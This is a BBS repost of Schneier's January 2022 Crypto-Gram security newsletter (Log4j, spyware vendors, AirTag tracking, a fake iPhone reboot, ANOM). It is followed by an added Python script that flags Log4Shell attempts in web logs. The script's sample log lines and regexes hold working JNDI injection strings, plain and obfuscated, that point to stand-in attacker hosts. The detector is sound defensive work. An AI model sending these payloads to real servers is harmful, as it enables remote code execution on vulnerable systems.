AT2k Design BBS Message Area
From: Sean Rima
To: All
Subject: CRYPTO-GRAM, January 15, 2022
Date/Time: January 16, 2022 10:11 PM

Crypto-Gram 
January 15, 2022

by Bruce Schneier 
Fellow and Lecturer, Harvard Kennedy School  schneier@schneier.com 
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and 
commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit Crypto-Gram's web page.

Read this issue on the web

These same essays and news items appear in the Schneier on Security blog, along
with a lively and intelligent comment section. An RSS feed is available.

** *** ***** ******* *********** *************

In this issue:

If these links don't work in your email client, try reading this issue of Crypto-Gram on the web.

More Log4j News
More on NSO Group and Cytrox: Two Cyberweapons Arms Manufacturers
Stolen Bitcoins Returned
Apple AirTags Are Being Used to Track People and Cars
More Russian Cyber Operations against Ukraine
People Are Increasingly Choosing Private Web Search
Norton's Antivirus Product Now Includes an Ethereum Miner
Fake QR Codes on Parking Meters
Apple's Private Relay Is Being Blocked
Faking an iPhone Reboot
Using Foreign Nationals to Bypass US Surveillance Restrictions
Using EM Waves to Detect Malware
Upcoming Speaking Engagements
** *** ***** ******* *********** *************

More Log4j News

[2021.12.16] Log4j is being exploited by all sorts of attackers, all over the 
Internet:

At that point it was reported that there were over 100 attempts to exploit the vulnerability every minute. "Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of those attempts were made by known malicious groups," said cybersecurity company Check Point.

And according to Check Point, attackers have now attempted to exploit the flaw on over 40% of global networks.

And a second vulnerability was found, in the patch for the first vulnerability.
This is likely not to be the last.

** *** ***** ******* *********** *************

More on NSO Group and Cytrox: Two Cyberweapons Arms Manufacturers

[2021.12.20] Citizen Lab published another report on the spyware used against two Egyptian nationals. One was hacked by NSO Group's Pegasus spyware. The other was hacked both by Pegasus and by the spyware from another cyberweapons arms manufacturer: Cytrox.

We haven't heard a lot about Cytrox and its Predator spyware. According to Citizen Lab:

We conducted Internet scanning for Predator spyware servers and found likely Predator customers in Armenia, Egypt, Greece, Indonesia, Madagascar, Oman, Saudi Arabia, and Serbia.

Cytrox was reported to be part of Intellexa, the so-called "Star Alliance of spyware," which was formed to compete with NSO Group, and which describes itself as "EU-based and regulated, with six sites and R&D labs throughout Europe."

In related news, Google's Project Zero has published a detailed analysis of NSO Group's zero-click iMessage exploit: FORCED ENTRY.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

By the way, this vulnerability was patched on 13 Sep 2021 in iOS 14.8.

** *** ***** ******* *********** *************

Stolen Bitcoins Returned

[2021.12.22] The US has returned $154 million in bitcoins stolen by a Sony 
employee.

However, on December 1, following an investigation in collaboration with Japanese law enforcement authorities, the FBI seized the 3879.16242937 BTC in Ishii's wallet after obtaining the private key, which made it possible to transfer all the bitcoins to the FBI's bitcoin wallet.

** *** ***** ******* *********** *************

Apple AirTags Are Being Used to Track People and Cars

[2021.12.31] This development surprises no one who has been paying attention:

Researchers now believe AirTags, which are equipped with Bluetooth technology, could be revealing a more widespread problem of tech-enabled tracking. They emit a digital signal that can be detected by devices running Apple's mobile operating system. Those devices then report where an AirTag has last been seen. Unlike similar tracking products from competitors such as Tile, Apple added features to prevent abuse, including notifications like the one Ms. Estrada received and automatic beeping. (Tile plans to release a feature to prevent the tracking of people next year, a spokeswoman for that company said.)

[...]

A person who doesn't own an iPhone might have a harder time detecting an unwanted AirTag. AirTags aren't compatible with Android smartphones. Earlier this month, Apple released an Android app that can scan for AirTags -- but you have to be vigilant enough to download it and proactively use it.

Apple declined to say if it was working with Google on technology that would 
allow Android phones to automatically detect its trackers.

People who said they have been tracked have called Apple's safeguards insufficient. Ms. Estrada said she was notified four hours after her phone first noticed the rogue gadget. Others said it took days before they were made aware of an unknown AirTag. According to Apple, the timing of the alerts can vary depending on the iPhone's operating system and location settings.

** *** ***** ******* *********** *************

More Russian Cyber Operations against Ukraine

[2022.01.05] Both Russia and Ukraine are preparing for military operations in 
cyberspace.

** *** ***** ******* *********** *************

People Are Increasingly Choosing Private Web Search

[2022.01.06] DuckDuckGo has had a banner year:

And yet, DuckDuckGo. The privacy-oriented search engine netted more than 35 billion search queries in 2021, a 46.4% jump over 2020 (23.6 billion). That's big. Even so, the company, which bills itself as the "Internet privacy company," offering a search engine and other products designed to "empower you to seamlessly take control of your personal information online without any tradeoffs," remains a rounding error compared to Google in search.

I use it. It's not as good a search engine as Google. Or, at least, Google often gets me what I want faster than DuckDuckGo does. To solve that, I use the feature that allows me to use Google's search engine through DuckDuckGo: prepend "!Google" to searches. Basically, DuckDuckGo launders my search.

EDITED TO ADD (1/12): I was wrong. DuckDuckGo does not provide privacy 
protections when searching using Google.

** *** ***** ******* *********** *************

Norton's Antivirus Product Now Includes an Ethereum Miner

[2022.01.07] Norton 360 can now mine Ethereum. It's opt-in, and the company keeps 15%.

It�s hard to uninstall this option.

** *** ***** ******* *********** *************

Fake QR Codes on Parking Meters

[2022.01.10] The City of Austin is warning about QR codes stuck to parking meters that take people to fraudulent payment sites.

** *** ***** ******* *********** *************

Apple's Private Relay Is Being Blocked

[2022.01.11] Some European cell phone carriers, and now T-Mobile, are blocking Apple's Private Relay anonymous browsing feature.

This could be an interesting battle to watch.

Slashdot thread.

** *** ***** ******* *********** *************

Faking an iPhone Reboot

[2022.01.12] Researchers have figured out how to intercept and fake an iPhone reboot:

We'll dissect the iOS system and show how it's possible to alter a shutdown event, tricking a user that got infected into thinking that the phone has been powered off, but in fact, it's still running. The "NoReboot" approach simulates a real shutdown. The user cannot feel a difference between a real shutdown and a "fake shutdown." There is no user-interface or any button feedback until the user turns the phone back "on."

It�s a complicated hack, but it works.

Uses are obvious:

Historically, when malware infects an iOS device, it can be removed simply by 
restarting the device, which clears the malware from memory.

However, this technique hooks the shutdown and reboot routines to prevent them 
from ever happening, allowing malware to achieve persistence as the device is 
never actually turned off.

I see this as another manifestation of the security problems that stem from all controls becoming software controls. Back when the physical buttons actually did things -- like turn the power, the Wi-Fi, or the camera on and off -- you could actually know that something was on or off. Now that software controls those functions, you can never be sure.

** *** ***** ******* *********** *************

Using Foreign Nationals to Bypass US Surveillance Restrictions

[2022.01.13] Remember when the US and Australian police surreptitiously owned and operated the encrypted cell phone app ANOM? They arrested 800 people in 2021 based on that operation.

New documents received by Motherboard show that over 100 of those phones were 
shipped to users in the US, far more than previously believed.

What's most interesting to me about this new information is how the US used the Australians to get around domestic spying laws:

For legal reasons, the FBI did not monitor outgoing messages from Anom devices determined to be inside the U.S. Instead, the Australian Federal Police (AFP) monitored them on behalf of the FBI, according to previously published court records. In those court records unsealed shortly before the announcement of the Anom operation, FBI Special Agent Nicholas Cheviron wrote that the FBI received Anom user data three times a week, which contained the messages of all of the users of Anom with some exceptions, including "the messages of approximately 15 Anom users in the U.S. sent to any other Anom device."

[...]

Stewart Baker, partner at Steptoe & Johnson LLP, and Bryce Klehm, associate editor of Lawfare, previously wrote that "The 'threat to life' standard echoes the provision of U.S. law that allows communications providers to share user data with law enforcement without legal process under 18 U.S.C. § 2702. Whether the AFP was relying on this provision of U.S. law or a more general moral imperative to take action to prevent imminent threats is not clear." That section of law discusses the voluntary disclosure of customer communications or records.

When asked about the practice of Australian law enforcement monitoring devices inside the U.S. on behalf of the FBI, Senator Ron Wyden told Motherboard in a statement "Multiple intelligence community officials have confirmed to me, in writing, that intelligence agencies cannot ask foreign partners to conduct surveillance that the U.S. would be legally prohibited from doing itself. The FBI should follow this same standard. Allegations that the FBI outsourced warrantless surveillance of Americans to a foreign government raise troubling questions about the Justice Department's oversight of these practices."

I and others have long suspected that the NSA uses foreign nationals to get 
around restrictions that prevent it from spying on Americans. It is interesting
to see the FBI using the same trick.

** *** ***** ******* *********** *************

Using EM Waves to Detect Malware

[2022.01.14] I don't even know what I think about this. Researchers have developed a malware detection system that uses EM waves: "Obfuscation Revealed: Leveraging Electromagnetic Signals for Obfuscated Malware Classification."

Abstract: The Internet of Things (IoT) is constituted of devices that are 
exponentially growing in number and in complexity. They use numerous customized
firmware and hardware, without taking into consideration security issues, which
make them a target for cybercriminals, especially malware authors.

We will present a novel approach of using side channel information to identify the kinds of threats that are targeting the device. Using our approach, a malware analyst is able to obtain precise knowledge about malware type and identity, even in the presence of obfuscation techniques which may prevent static or symbolic binary analysis. We recorded 100,000 measurement traces from an IoT device infected by various in-the-wild malware samples and realistic benign activity. Our method does not require any modification on the target device. Thus, it can be deployed independently from the resources available without any overhead. Moreover, our approach has the advantage that it can hardly be detected and evaded by the malware authors. In our experiments, we were able to predict three generic malware types (and one benign class) with an accuracy of 99.82%. Even more, our results show that we are able to classify altered malware samples with unseen obfuscation techniques during the training phase, and to determine what kind of obfuscations were applied to the binary, which makes our approach particularly useful for malware analysts.

This seems impossible. It�s research, not a commercial product. But it�s 
fascinating if true.

** *** ***** ******* *********** *************

Upcoming Speaking Engagements

[2022.01.14] This is a current list of where and when I am scheduled to speak:

I'm giving an online-only talk on "Securing a World of Physically Capable Computers" as part of Teleport's Security Visionaries 2022 series, on January 18, 2022.

I'm speaking at IT-S Now 2022 in Vienna on June 2, 2022.

I'm speaking at the 14th International Conference on Cyber Conflict, CyCon 2022, in Tallinn, Estonia on June 3, 2022.

I'm speaking at the RSA Conference 2022 in San Francisco, June 6-9, 2022.

The list is maintained on this page.

** *** ***** ******* *********** *************

Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security technology. To subscribe, or to read back issues, see Crypto-Gram's web page.

You can also read these articles on my blog, Schneier on Security.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

Bruce Schneier is an internationally renowned security technologist, called a security guru by the Economist. He is the author of over one dozen books -- including his latest, We Have Root -- as well as hundreds of articles, essays, and academic papers. His newsletter and blog are read by over 250,000 people. Schneier is a fellow at the Berkman Klein Center for Internet & Society at Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an Advisory Board Member of the Electronic Privacy Information Center and VerifiedVoting.org. He is the Chief of Security Architecture at Inrupt, Inc.

Copyright © 2022 by Bruce Schneier.

** *** ***** ******* *********** *************

Mailing list hosting graciously provided by MailChimp. Sent without web bugs or
link tracking.

--- BBBS/Li6 v4.10 Toy-5
 * Origin: TCOB1 at tcob1.duckdns.org BinkP / Telnet (618:500/14)
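The Log4j item in the newsletter above reports exploit attempts being blocked by the million but says nothing about what one looks like on the wire. What follows is an added example, not code from Crypto-Gram, Check Point or the Log4j project: it flags Log4Shell attempts in HTTP access-log lines. The vulnerability is CVE-2021-44228, and the follow-up bug in the first patch that the item mentions is CVE-2021-45046; both identifiers come from general knowledge, not from the newsletter. The log lines in SAMPLE_LOG are constructed, and the obfuscations the code unwinds (URL-encoding, nested ${lower:}/${upper:} lookups, and ${name:-default} forms such as ${::-j}) are the common ones, not a complete catalogue.

```python
"""Flag Log4Shell (CVE-2021-44228 / CVE-2021-45046) exploit attempts in HTTP
access-log lines.

Added example: not code from Crypto-Gram, Check Point or the Log4j project.
SAMPLE_LOG is constructed. The obfuscations unwound here (URL-encoding,
nested ${lower:}/${upper:} lookups, ${name:-default} forms) are the common
ones seen in the wild, not a complete catalogue.
"""
import re
from urllib.parse import unquote

# One innermost Log4j lookup: "${...}" whose body holds no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup and its URL scheme, e.g. ${jndi:ldap://203.0.113.5:1389/a}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:[^}]*\}?", re.IGNORECASE)


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j's StrSubstitutor does for the
    lookup types attackers use to hide the string "jndi". Anything else,
    including ${jndi:...} itself, is returned unchanged."""
    body = m.group(1)
    name, sep, default = body.partition(":-")   # ${name:-default}
    kind, _, arg = name.partition(":")          # ${kind:arg}
    kind = kind.lower()
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    if sep:
        # Unknown or empty variable with a default: ${::-j}, ${env:NOPE:-j}
        return default
    return m.group(0)


def normalize(text, max_rounds=16):
    """Undo URL-encoding (attackers double-encode) and resolve nested lookups
    innermost-first until the string stops changing."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_log4shell(line):
    """Return (scheme, normalized payload) if the line carries a JNDI lookup,
    otherwise None."""
    m = _JNDI.search(normalize(line))
    if m is None:
        return None
    return m.group(1).lower(), m.group(0)


def scan(lines):
    """Return [(line_number, scheme, payload), ...] for every line that hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_log4shell(line)
        if found is not None:
            hits.append((n, found[0], found[1]))
    return hits


# Constructed Combined-Log-Format lines: a plain request, three attack
# variants (plain, lower-lookup obfuscated, URL-encoded with ${::-j}), and a
# benign line that merely mentions log4j.
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Jan/2022:10:11:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Jan/2022:10:11:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.12 - - [16/Jan/2022:10:11:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:rmi://203.0.113.5:1099/x}"',
    '198.51.100.14 - - [16/Jan/2022:10:11:09 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fexample.com%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.20 - - [16/Jan/2022:10:11:11 +0000] "GET /docs/log4j.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, payload in scan(SAMPLE_LOG):
        print(f"line {n}: jndi via {scheme}: {payload}")
```

A signature like this is for triage, not prevention: a hit shows that someone sent a lookup string, not that the server resolved it, and a naive substring match for "${jndi:" misses the second and third variants above, which is why the lookups are evaluated innermost-first before matching. The fix remains upgrading Log4j (or removing the JndiLookup class) on every host, whether or not its logs show attempts.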